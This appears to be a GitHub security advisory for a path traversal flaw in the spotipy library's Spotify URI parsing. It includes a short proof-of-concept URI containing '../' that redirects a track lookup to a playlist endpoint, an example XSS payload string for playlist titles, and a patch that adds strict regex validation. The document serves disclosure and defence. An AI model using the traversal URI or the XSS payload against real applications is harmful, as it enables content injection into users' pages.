Path traversal vulnerability that may lead to type confusion in URI handling code

Low
stephanebruckert published GHSA-q764-g6fm-555v Jan 23, 2023

Package

spotipy (pip)

Affected versions

<=2.22.0

Patched versions

2.22.1

Description

Summary

If a malicious URI is passed to the library, the library can be tricked into performing an operation on a different API endpoint than intended.

Details

The code Spotipy uses to parse URIs and URLs accepts user input too liberally, which allows a malicious user to insert arbitrary characters into the path used for API requests. Because the input may contain .., an attacker can redirect, for example, a track lookup via spotifyApi.track() to a different API endpoint such as playlists. The same applies to other endpoints.
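
The parsing problem can be reproduced without network access. The following is a minimal sketch: legacy_get_id is a standalone copy of the pre-patch _get_id logic shown as removed lines in the patch at the end of this report (the type-mismatch warning is omitted). The "tracks/" prefix and the use of posixpath.normpath to model how dot segments collapse are assumptions made for illustration, not the library's actual request code.

```python
import posixpath


def legacy_get_id(expected_type, value):
    """Standalone copy of the pre-patch ID extraction (warnings omitted).

    expected_type is unused here because the original only logged a warning
    on a type mismatch and returned the ID anyway.
    """
    fields = value.split(":")
    if len(fields) >= 3:
        return fields[-1].split("?")[0]
    fields = value.split("/")
    if len(fields) >= 3:
        return fields[-1].split("?")[0]
    return value


malicious = "spotify:track:../playlists/3cEYpjA9oz9GiPac4AsH4n"

# Splitting on ":" yields exactly three fields, so the last field is
# returned unchanged, including the "../" segment.
extracted = legacy_get_id("track", malicious)

# Assumption: the track lookup prepends "tracks/" to the extracted ID.
request_path = "tracks/" + extracted

# normpath models how the dot segment cancels out the "tracks" component.
effective_path = posixpath.normpath(request_path)

print(extracted)
print(effective_path)
```

Because the URI still has the form spotify:track:..., the type check in the old code passes and no warning is logged.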

Before the security advisory feature was enabled on GitHub, I was already in contact with Stéphane Bruckert via e-mail, and he asked me to look into a potential fix.

My recommendation is to perform stricter parsing of URLs and URIs, which I implemented in the patch included at the end of the report. If you prefer, I can also invite you to a private fork of the repository.

PoC

The PoC expects the SPOTIFY_CLIENT_ID and SPOTIFY_CLIENT_SECRET environment variables to be set so that it can authenticate against the API.

import spotipy
from spotipy.oauth2 import SpotifyClientCredentials


def main():
    spotifyApi = spotipy.Spotify(client_credentials_manager=SpotifyClientCredentials())

    # This URI contains the example playlist ID from the Spotify docs. A malicious
    # playlist could instead carry an XSS payload in its title. A playlist with
    # such a title was also included in the initial report e-mailed to the maintainer.
    malicious_spotify_url = 'spotify:track:../playlists/3cEYpjA9oz9GiPac4AsH4n'

    # Call track(), expecting a track name that is not user-controllable,
    # e.g. for display on a website.
    # The modified track URI instead makes the library return the name of a playlist,
    # which anyone can create and which can contain anything.
    track = spotifyApi.track(malicious_spotify_url)

    # Prints:
    # 'Name of the track: Spotify Web API Testing playlist'
    # A malicious playlist could also have an XSS payload as title, which would result in:
    # 'Name of the track: <img src=x onerror=prompt(1)>'
    print(f"Name of the track: {track['name']}")

if __name__ == '__main__':
    main()

Impact

The impact of this vulnerability depends heavily on what operations a client application performs when it handles a URI from a user and how it uses the responses it receives from the API.
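
As an illustration of the client side, an application that displays API results can limit the impact by checking the type of the returned object and escaping it before rendering. This is a minimal sketch under assumptions: render_track_name is a hypothetical helper, and it assumes the response dictionary carries a "type" field alongside "name", as Spotify Web API objects generally do.

```python
import html


def render_track_name(item):
    """Return an HTML-safe track name, rejecting objects of another type.

    item is assumed to be a response dictionary with "type" and "name" keys.
    """
    if item.get("type") != "track":
        raise ValueError("expected a track object, got %r" % item.get("type"))
    # Escape the name so markup in it is displayed as text, not interpreted.
    return html.escape(item["name"])


# A playlist object smuggled in through a crafted URI is rejected ...
playlist = {"type": "playlist", "name": "<img src=x onerror=prompt(1)>"}
try:
    render_track_name(playlist)
except ValueError as error:
    print("rejected:", error)

# ... and even a genuine track name is escaped before display.
track = {"type": "track", "name": "<img src=x onerror=prompt(1)>"}
print(render_track_name(track))
```

Neither check replaces the fix in the library; they only reduce what a confused response can do in the application.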

Possible Patch

Caveats of this patch

  • The ID parsing functionality now raises ValueError if it cannot parse an ID, instead of logging a warning or silently passing back whatever it received as input.
    • WARNING: I only adjusted the unit tests that do not require a valid user session to expect ValueError; other tests may also need adjustment.
  • Unfortunately, I could not find conclusive documentation on what constitutes a valid Spotify username. Some usernames apparently contain alphanumeric characters, mine contains only digits, and those of newly created accounts seem to follow the base-62 scheme. You as developers probably have deeper insight into this; otherwise, whether additional characters are valid will probably have to be discovered via bug reports.
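
For calling code, the first caveat means that identifiers coming from users may now raise ValueError before any request is made. A minimal sketch of how a caller might handle that follows. The helper name_or_none and the stand-in fake_lookup are hypothetical; fake_lookup only imitates the rejection behaviour so that the example runs without credentials or network access.

```python
def name_or_none(lookup, user_input):
    """Return the looked-up item's name, or None if the identifier is rejected.

    lookup is any callable that raises ValueError for unparseable input,
    such as a lookup method of a patched client (assumption).
    """
    try:
        item = lookup(user_input)
    except ValueError:
        # The identifier could not be parsed; treat it as "not found".
        return None
    return item["name"]


def fake_lookup(identifier):
    # Hypothetical stand-in for a patched lookup: a crude alphanumeric check
    # replaces the real parsing, and a fixed dictionary replaces the response.
    if not identifier.isalnum():
        raise ValueError("Unsupported URL / URI")
    return {"name": "Example"}


print(name_or_none(fake_lookup, "3cEYpjA9oz9GiPac4AsH4n"))
print(name_or_none(fake_lookup, "bogus_urn"))
```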
From 30cf29b16e893dcac974dbd7481fb58a073b853c Mon Sep 17 00:00:00 2001
From: Shaderbug <119610832+Shaderbug@users.noreply.github.com>
Date: Tue, 10 Jan 2023 19:26:18 +0100
Subject: [PATCH] Improve URL and URI handling

---
 spotipy/client.py                            | 61 +++++++++++++++-----
 tests/integration/non_user_endpoints/test.py |  6 +-
 2 files changed, 49 insertions(+), 18 deletions(-)

diff --git a/spotipy/client.py b/spotipy/client.py
index d7025a9..b094947 100644
--- a/spotipy/client.py
+++ b/spotipy/client.py
@@ -6,6 +6,7 @@ __all__ = ["Spotify", "SpotifyException"]
 
 import json
 import logging
+import re
 import warnings
 
 import requests
@@ -96,6 +97,29 @@ class Spotify(object):
         "US",
         "UY"]
 
+    # Spotify URI scheme defined in [1], and the ID format as base-62 in [2].
+    #
+    # Unfortunately the IANA specification is out of date and doesn't include the new types
+    # show and episode. Additionally, for the user URI, it does not specify which characters
+    # are valid for usernames, so the assumption is alphanumeric which coincidentially are also
+    # the same ones base-62 uses.
+    # In limited manual exploration this seems to hold true, as newly accounts are assigned an
+    # identifier that looks like the base-62 of all other IDs, but some older accounts only have
+    # numbers and even older ones seemed to have been allowed to freely pick this name.
+    #
+    # [1] https://www.iana.org/assignments/uri-schemes/prov/spotify
+    # [2] https://developer.spotify.com/documentation/web-api/#spotify-uris-and-ids
+    _regex_spotify_uri = r'^spotify:(?P<type>track|artist|album|playlist|show|episode|user):(?P<id>[0-9A-Za-z]+)$'
+
+    # Spotify URLs are defined at [1]. The assumption is made that they are all
+    # pointing to open.spotify.com, so a regex is used to parse them as well,
+    # instead of a more complex URL parsing function.
+    #
+    # [1] https://developer.spotify.com/documentation/web-api/#spotify-uris-and-ids
+    _regex_spotify_url = r'^(http[s]?:\/\/)?open.spotify.com\/(?P<type>track|artist|album|playlist|show|episode|user)\/(?P<id>[0-9A-Za-z]+)(\?.*)?$'
+
+    _regex_base62 = r'^[0-9A-Za-z]+$'
+
     def __init__(
         self,
         auth=None,
@@ -1940,20 +1964,27 @@ class Spotify(object):
         return path
 
     def _get_id(self, type, id):
-        fields = id.split(":")
-        if len(fields) >= 3:
-            if type != fields[-2]:
-                logger.warning('Expected id of type %s but found type %s %s',
-                               type, fields[-2], id)
-            return fields[-1].split("?")[0]
-        fields = id.split("/")
-        if len(fields) >= 3:
-            itype = fields[-2]
-            if type != itype:
-                logger.warning('Expected id of type %s but found type %s %s',
-                               type, itype, id)
-            return fields[-1].split("?")[0]
-        return id
+        uri_match = re.search(Spotify._regex_spotify_uri, id)
+        if uri_match is not None:
+            uri_match_groups = uri_match.groupdict()
+            if uri_match_groups['type'] != type:
+                raise ValueError("Unexpected Spotify URI type.")
+            else:
+                return uri_match_groups['id']
+
+        url_match = re.search(Spotify._regex_spotify_url, id)
+        if url_match is not None:
+            url_match_groups = url_match.groupdict()
+            if url_match_groups['type'] != type:
+                raise ValueError("Unexpected Spotify URL type.")
+            else:
+                return url_match_groups['id']
+
+        # Raw identifiers might be passed, ensure they are also base-62
+        if re.search(Spotify._regex_base62, id) is not None:
+            return id
+
+        raise ValueError("Unsupported URL / URI")
 
     def _get_uri(self, type, id):
         if self._is_uri(id):
@@ -1962,7 +1993,7 @@ class Spotify(object):
             return "spotify:" + type + ":" + self._get_id(type, id)
 
     def _is_uri(self, uri):
-        return uri.startswith("spotify:") and len(uri.split(':')) == 3
+        return re.search(Spotify._regex_spotify_uri, uri) is not None
 
     def _search_multiple_markets(self, q, limit, offset, type, markets, total):
         if total and limit > total:
diff --git a/tests/integration/non_user_endpoints/test.py b/tests/integration/non_user_endpoints/test.py
index 96ee4da..116e1d9 100644
--- a/tests/integration/non_user_endpoints/test.py
+++ b/tests/integration/non_user_endpoints/test.py
@@ -280,7 +280,7 @@ class AuthTestSpotipy(unittest.TestCase):
         try:
             self.spotify.track(self.bad_id)
             self.assertTrue(False)
-        except SpotifyException:
+        except ValueError:
             self.assertTrue(True)
 
     def test_show_urn(self):
@@ -296,7 +296,7 @@ class AuthTestSpotipy(unittest.TestCase):
         self.assertTrue(show['name'] == 'Heavyweight')
 
     def test_show_bad_urn(self):
-        with self.assertRaises(SpotifyException):
+        with self.assertRaises(ValueError):
             self.spotify.show("bogus_urn", market="US")
 
     def test_shows(self):
@@ -333,7 +333,7 @@ class AuthTestSpotipy(unittest.TestCase):
         self.assertTrue(episode['name'] == '#1 Buzz')
 
     def test_episode_bad_urn(self):
-        with self.assertRaises(SpotifyException):
+        with self.assertRaises(ValueError):
             self.spotify.episode("bogus_urn", market="US")
 
     def test_episodes(self):
-- 
2.34.1
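
The behaviour of the patched parsing can be checked in isolation. The sketch below copies the three patterns from the patch into a standalone function, strict_get_id (a hypothetical name). One deliberate deviation: it uses fullmatch instead of the patch's re.search, so that input with a trailing newline is rejected as well; that choice is an assumption of this sketch, not part of the patch.

```python
import re

# Patterns copied from the patch above.
URI_RE = re.compile(
    r'^spotify:(?P<type>track|artist|album|playlist|show|episode|user)'
    r':(?P<id>[0-9A-Za-z]+)$'
)
URL_RE = re.compile(
    r'^(http[s]?:\/\/)?open.spotify.com\/'
    r'(?P<type>track|artist|album|playlist|show|episode|user)'
    r'\/(?P<id>[0-9A-Za-z]+)(\?.*)?$'
)
BASE62_RE = re.compile(r'^[0-9A-Za-z]+$')


def strict_get_id(expected_type, value):
    """Extract a base-62 ID from a URI, URL, or raw ID, or raise ValueError."""
    for pattern, label in ((URI_RE, "URI"), (URL_RE, "URL")):
        # Deviation from the patch: fullmatch also rejects a trailing newline.
        match = pattern.fullmatch(value)
        if match is not None:
            if match.group("type") != expected_type:
                raise ValueError("Unexpected Spotify %s type." % label)
            return match.group("id")
    # Raw identifiers are accepted only if they are base-62 themselves.
    if BASE62_RE.fullmatch(value) is not None:
        return value
    raise ValueError("Unsupported URL / URI")


print(strict_get_id("playlist", "spotify:playlist:3cEYpjA9oz9GiPac4AsH4n"))

try:
    strict_get_id("track", "spotify:track:../playlists/3cEYpjA9oz9GiPac4AsH4n")
except ValueError as error:
    print("rejected:", error)
```

The PoC URI is rejected because "../playlists/..." contains characters outside the base-62 alphabet, so neither the URI pattern nor the raw-ID pattern matches.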

Severity

Low

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).

CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: Required
Scope: Unchanged
Confidentiality: None
Integrity: None
Availability: None

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N
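
The vector string encodes the same base metrics listed above in abbreviated form. As a minimal sketch, the hypothetical helper decode_cvss_vector below expands a CVSS 3.1 base vector into readable names; it handles only the eight base metrics and computes no score.

```python
# Abbreviations of the CVSS v3.1 base metrics and their possible values.
_LEVELS = {"N": "None", "L": "Low", "H": "High"}
METRICS = {
    "AV": ("Attack vector",
           {"N": "Network", "A": "Adjacent", "L": "Local", "P": "Physical"}),
    "AC": ("Attack complexity", {"L": "Low", "H": "High"}),
    "PR": ("Privileges required", _LEVELS),
    "UI": ("User interaction", {"N": "None", "R": "Required"}),
    "S": ("Scope", {"U": "Unchanged", "C": "Changed"}),
    "C": ("Confidentiality", _LEVELS),
    "I": ("Integrity", _LEVELS),
    "A": ("Availability", _LEVELS),
}


def decode_cvss_vector(vector):
    """Expand a CVSS 3.1 base vector string into {metric name: value}."""
    prefix, *parts = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError("this sketch only handles CVSS 3.1 vectors")
    decoded = {}
    for part in parts:
        key, value = part.split(":")
        name, values = METRICS[key]
        decoded[name] = values[value]
    return decoded


for name, value in decode_cvss_vector(
        "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:N").items():
    print(f"{name}: {value}")
```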

CVE ID

CVE-2023-23608

Credits